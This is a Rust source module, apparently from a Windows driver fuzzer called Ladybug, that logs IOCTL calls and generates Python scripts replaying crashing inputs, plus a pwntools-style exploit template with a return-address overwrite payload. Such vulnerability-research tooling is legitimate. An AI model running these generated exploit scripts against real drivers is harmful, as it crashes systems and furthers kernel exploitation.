//! PoC Generator Module
//!
//! Generates Python/pwntools exploit code from crash data.
//! Logs all IOCTL calls for crash reproduction.

#![allow(dead_code)]

use std::fs::{File, OpenOptions};
use std::io::Write;
use std::path::Path;
use std::collections::VecDeque;

/// Tracks IOCTL calls and generates PoC
pub struct PocGenerator {
    /// Log file for real-time logging
    log_file: Option<File>,
    /// Last N calls (ring buffer for crash reproduction)
    last_calls: VecDeque<IoctlCall>,
    /// Maximum calls to keep
    max_history: usize,
    /// Device path
    device: String,
    /// Call counter
    call_count: u64,
}

#[derive(Clone)]
pub struct IoctlCall {
    pub ioctl: u32,
    pub input: Vec<u8>,
    pub input_size: usize,
    pub output_size: usize,
    pub result: i32,
    pub error_code: u32,
    pub timestamp: u64,
}

impl PocGenerator {
    pub fn new(device: &str, log_path: Option<&Path>) -> Self {
        let log_file = log_path.and_then(|p| {
            OpenOptions::new()
                .create(true)
                .write(true)
                .truncate(true)
                .open(p)
                .ok()
        });
        
        Self {
            log_file,
            last_calls: VecDeque::with_capacity(100),
            max_history: 100,
            device: device.to_string(),
            call_count: 0,
        }
    }
    
    /// Log an IOCTL call BEFORE sending (in case of BSOD)
    pub fn log_before_call(&mut self, ioctl: u32, input: &[u8]) {
        self.call_count += 1;
        
        // Write to log file immediately (flush!)
        if let Some(ref mut f) = self.log_file {
            let hex_input: String = input.iter()
                .take(64)
                .map(|b| format!("{:02x}", b))
                .collect::<Vec<_>>()
                .join("");
            
            let line = format!(
                "[{}] IOCTL=0x{:08X} SIZE={} DATA={}{}\n",
                self.call_count,
                ioctl,
                input.len(),
                hex_input,
                if input.len() > 64 { "..." } else { "" }
            );
            let _ = f.write_all(line.as_bytes());
            let _ = f.flush(); // CRITICAL: flush before IOCTL!
        }
    }
    
    /// Record call result after completion
    pub fn log_after_call(&mut self, ioctl: u32, input: &[u8], result: i32, error_code: u32) {
        let call = IoctlCall {
            ioctl,
            input: input.to_vec(),
            input_size: input.len(),
            output_size: 0,
            result,
            error_code,
            timestamp: self.call_count,
        };
        
        // Add to ring buffer
        if self.last_calls.len() >= self.max_history {
            self.last_calls.pop_front();
        }
        self.last_calls.push_back(call);
        
        // Log result
        if let Some(ref mut f) = self.log_file {
            let line = format!(
                "    -> result={} error=0x{:08X}\n",
                result, error_code
            );
            let _ = f.write_all(line.as_bytes());
            let _ = f.flush();
        }
    }
    
    /// Generate Python pwntools PoC for a single IOCTL
    pub fn generate_single_poc(&self, ioctl: u32, input: &[u8]) -> String {
        let hex_bytes = input.iter()
            .map(|b| format!("\\x{:02x}", b))
            .collect::<String>();
        
        format!(r#"#!/usr/bin/env python3
"""
Windows Driver Exploit PoC
Generated by Ladybug

Target: {device}
IOCTL:  0x{ioctl:08X}
Input:  {size} bytes

WARNING: This may BSOD the system!
"""

import ctypes
from ctypes import wintypes
import struct

# Windows API
kernel32 = ctypes.windll.kernel32

GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
FILE_ATTRIBUTE_NORMAL = 0x80

# Open driver handle
def open_driver(device_path):
    handle = kernel32.CreateFileW(
        device_path,
        GENERIC_READ | GENERIC_WRITE,
        0,
        None,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        None
    )
    if handle == -1:
        raise Exception(f"Failed to open {{device_path}}")
    return handle

# Send IOCTL
def send_ioctl(handle, ioctl_code, in_buffer, out_size=0x1000):
    in_buf = ctypes.create_string_buffer(in_buffer, len(in_buffer))
    out_buf = ctypes.create_string_buffer(out_size)
    bytes_returned = wintypes.DWORD()
    
    result = kernel32.DeviceIoControl(
        handle,
        ioctl_code,
        in_buf,
        len(in_buffer),
        out_buf,
        out_size,
        ctypes.byref(bytes_returned),
        None
    )
    
    if result:
        return out_buf.raw[:bytes_returned.value]
    else:
        error = kernel32.GetLastError()
        print(f"[!] IOCTL failed with error: 0x{{error:08X}}")
        return None

def main():
    device = r"{device}"
    ioctl = 0x{ioctl:08X}
    
    # Crash payload
    payload = b"{hex_bytes}"
    
    print(f"[*] Opening {{device}}...")
    handle = open_driver(device)
    print(f"[+] Handle: 0x{{handle:X}}")
    
    print(f"[*] Sending IOCTL 0x{{ioctl:08X}} with {{len(payload)}} bytes...")
    print("[!] WARNING: This may crash the system!")
    input("[*] Press Enter to continue...")
    
    result = send_ioctl(handle, ioctl, payload)
    
    if result:
        print(f"[+] Success! Returned {{len(result)}} bytes")
        print(f"    {{result[:64].hex()}}")
    
    kernel32.CloseHandle(handle)

if __name__ == "__main__":
    main()
"#,
            device = self.device,
            ioctl = ioctl,
            size = input.len(),
            hex_bytes = hex_bytes,
        )
    }
    
    /// Generate Python pwntools PoC for a sequence (UAF)
    pub fn generate_sequence_poc(&self, sequence: &[(u32, Vec<u8>)], vuln_type: &str) -> String {
        let mut steps = String::new();
        
        for (i, (ioctl, input)) in sequence.iter().enumerate() {
            let hex_bytes = input.iter()
                .map(|b| format!("\\x{:02x}", b))
                .collect::<String>();
            
            steps.push_str(&format!(r#"
    # Step {}: IOCTL 0x{:08X}
    payload_{} = b"{}"
    print(f"[*] Step {}: Sending IOCTL 0x{:08X}...")
    send_ioctl(handle, 0x{:08X}, payload_{})
"#,
                i + 1, ioctl,
                i + 1, hex_bytes,
                i + 1, ioctl,
                ioctl, i + 1
            ));
        }
        
        format!(r#"#!/usr/bin/env python3
"""
Windows Driver Exploit PoC - {vuln_type}
Generated by Ladybug

Target: {device}
Type:   {vuln_type}
Steps:  {num_steps}

WARNING: This WILL BSOD the system!
"""

import ctypes
from ctypes import wintypes
import struct
import time

# Windows API
kernel32 = ctypes.windll.kernel32

GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
FILE_ATTRIBUTE_NORMAL = 0x80

def open_driver(device_path):
    handle = kernel32.CreateFileW(
        device_path,
        GENERIC_READ | GENERIC_WRITE,
        0,
        None,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        None
    )
    if handle == -1:
        raise Exception(f"Failed to open {{device_path}}")
    return handle

def send_ioctl(handle, ioctl_code, in_buffer, out_size=0x1000):
    in_buf = ctypes.create_string_buffer(in_buffer, len(in_buffer))
    out_buf = ctypes.create_string_buffer(out_size)
    bytes_returned = wintypes.DWORD()
    
    result = kernel32.DeviceIoControl(
        handle,
        ioctl_code,
        in_buf,
        len(in_buffer),
        out_buf,
        out_size,
        ctypes.byref(bytes_returned),
        None
    )
    
    if result:
        return out_buf.raw[:bytes_returned.value]
    else:
        error = kernel32.GetLastError()
        print(f"[!] IOCTL failed: 0x{{error:08X}}")
        return None

def exploit():
    device = r"{device}"
    
    print(f"[*] {vuln_type} Exploit")
    print(f"[*] Target: {{device}}")
    print("[!] WARNING: This WILL crash the system!")
    input("[*] Press Enter to continue...")
    
    handle = open_driver(device)
    print(f"[+] Handle: 0x{{handle:X}}")
{steps}
    print("[+] Sequence complete!")
    kernel32.CloseHandle(handle)

if __name__ == "__main__":
    exploit()
"#,
            vuln_type = vuln_type,
            device = self.device,
            num_steps = sequence.len(),
            steps = steps,
        )
    }
    
    /// Generate PoC from last N calls (for crash reproduction)
    pub fn generate_crash_reproduction_poc(&self) -> String {
        let calls: Vec<_> = self.last_calls.iter().cloned().collect();
        let sequence: Vec<(u32, Vec<u8>)> = calls.iter()
            .map(|c| (c.ioctl, c.input.clone()))
            .collect();
        
        self.generate_sequence_poc(&sequence, "Crash Reproduction")
    }
    
    /// Save PoC to file
    pub fn save_poc(&self, poc: &str, filename: &Path) -> std::io::Result<()> {
        let mut file = File::create(filename)?;
        file.write_all(poc.as_bytes())?;
        Ok(())
    }
    
    /// Get last N calls for crash analysis
    pub fn get_last_calls(&self, n: usize) -> Vec<IoctlCall> {
        self.last_calls.iter()
            .rev()
            .take(n)
            .cloned()
            .collect()
    }
    
    /// Dump last calls to file (emergency dump before potential crash)
    pub fn emergency_dump(&self, path: &Path) -> std::io::Result<()> {
        let mut file = File::create(path)?;
        
        writeln!(file, "=== EMERGENCY DUMP ===")?;
        writeln!(file, "Device: {}", self.device)?;
        writeln!(file, "Total calls: {}", self.call_count)?;
        writeln!(file, "Last {} calls:", self.last_calls.len())?;
        writeln!(file)?;
        
        for (i, call) in self.last_calls.iter().enumerate() {
            writeln!(file, "[{}] IOCTL=0x{:08X}", i, call.ioctl)?;
            writeln!(file, "    Input size: {}", call.input_size)?;
            writeln!(file, "    Result: {} (0x{:08X})", call.result, call.error_code)?;
            
            let hex: String = call.input.iter()
                .take(128)
                .map(|b| format!("{:02x}", b))
                .collect::<Vec<_>>()
                .join(" ");
            writeln!(file, "    Data: {}", hex)?;
            writeln!(file)?;
        }
        
        // Also generate Python PoC
        writeln!(file, "\n=== PYTHON POC ===\n")?;
        writeln!(file, "{}", self.generate_crash_reproduction_poc())?;
        
        Ok(())
    }
}

impl Default for PocGenerator {
    fn default() -> Self {
        Self::new("", None)
    }
}

/// Generate pwntools-style shellcode helper
pub fn generate_pwntools_template(device: &str) -> String {
    format!(r#"#!/usr/bin/env python3
"""
Windows Driver Exploit Template (pwntools-style)
Generated by Ladybug

Use this as a base for developing your exploit.
"""

from pwn import *
import ctypes
from ctypes import wintypes

# Context
context.arch = 'amd64'
context.os = 'windows'

# Windows API wrapper
class WinDriver:
    def __init__(self, device):
        self.kernel32 = ctypes.windll.kernel32
        self.device = device
        self.handle = None
        
    def open(self):
        self.handle = self.kernel32.CreateFileW(
            self.device,
            0xC0000000,  # GENERIC_READ | GENERIC_WRITE
            0, None, 3,  # OPEN_EXISTING
            0x80, None   # FILE_ATTRIBUTE_NORMAL
        )
        if self.handle == -1:
            log.error(f"Failed to open {{self.device}}")
            return False
        log.success(f"Opened {{self.device}}: 0x{{self.handle:X}}")
        return True
    
    def ioctl(self, code, data, out_size=0x1000):
        """Send IOCTL with pwntools-style interface"""
        in_buf = ctypes.create_string_buffer(bytes(data), len(data))
        out_buf = ctypes.create_string_buffer(out_size)
        ret = wintypes.DWORD()
        
        result = self.kernel32.DeviceIoControl(
            self.handle, code,
            in_buf, len(data),
            out_buf, out_size,
            ctypes.byref(ret), None
        )
        
        if result:
            return out_buf.raw[:ret.value]
        return None
    
    def close(self):
        if self.handle:
            self.kernel32.CloseHandle(self.handle)

# Exploit helpers
def p32(x): return pack('<I', x)
def p64(x): return pack('<Q', x)
def u32(x): return unpack('<I', x)[0]
def u64(x): return unpack('<Q', x)[0]

def main():
    device = r"{device}"
    
    log.info("Windows Driver Exploit")
    drv = WinDriver(device)
    
    if not drv.open():
        return
    
    # Build payload
    payload = b""
    payload += p64(0x4141414141414141)  # Example: overwrite return address
    payload += b"A" * 0x100             # Padding
    
    # Send exploit
    log.info(f"Sending {{len(payload)}} bytes...")
    result = drv.ioctl(0x222003, payload)  # Change IOCTL code
    
    if result:
        log.success(f"Got {{len(result)}} bytes back")
        hexdump(result)
    
    drv.close()

if __name__ == "__main__":
    main()
"#, device = device)
}
